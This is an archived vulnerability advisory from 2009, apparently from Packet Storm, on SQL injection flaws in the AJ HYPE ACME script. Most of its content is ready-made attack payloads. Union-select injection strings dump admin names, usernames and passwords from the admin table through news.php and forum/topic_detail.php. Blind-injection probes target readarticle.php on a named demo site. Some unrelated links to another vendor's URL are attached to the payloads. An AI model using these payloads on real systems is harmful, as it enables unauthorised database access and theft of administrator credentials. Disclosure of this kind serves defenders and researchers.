AJ HYPE ACME suffers from multiple remote SQL injection vulnerabilities.
7ac06ae35363e16c3fd02d45124f4ad3/*
AJ HYPE ACME (bSQLi/SQLi) Multiple Remote Vulnerabilities
Discovered by : MizoZ
Contact : mizozx@gmail.com
Date : July 29 2009
Greetings : Moudi , Zuka, All friends
*/
SQL Injection news.php (GET : id) :
[HOST]/[PATH]/news.php?id=[SQL
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
SQL CODE :
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password),4,5+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
-----------------------------
SQL Injection topic_detail.php (GET : id) :
[HOST]/[PATH]/forum/topic_detail.php?id=[SQL
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
SQL CODE :
null+union+select+1,2,3,concat(admin_name,0x3a,username,0x3a,admin_password),5,6,7,8+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
ONLY IN ACME EXTENSION
-----------------------------
Blind SQL Injection readarticle.php (GET : artid)
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=1--==>>
TRUE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=0--==>>
FALSE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+%28select%20@@version%29=5--==>>
TRUE
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!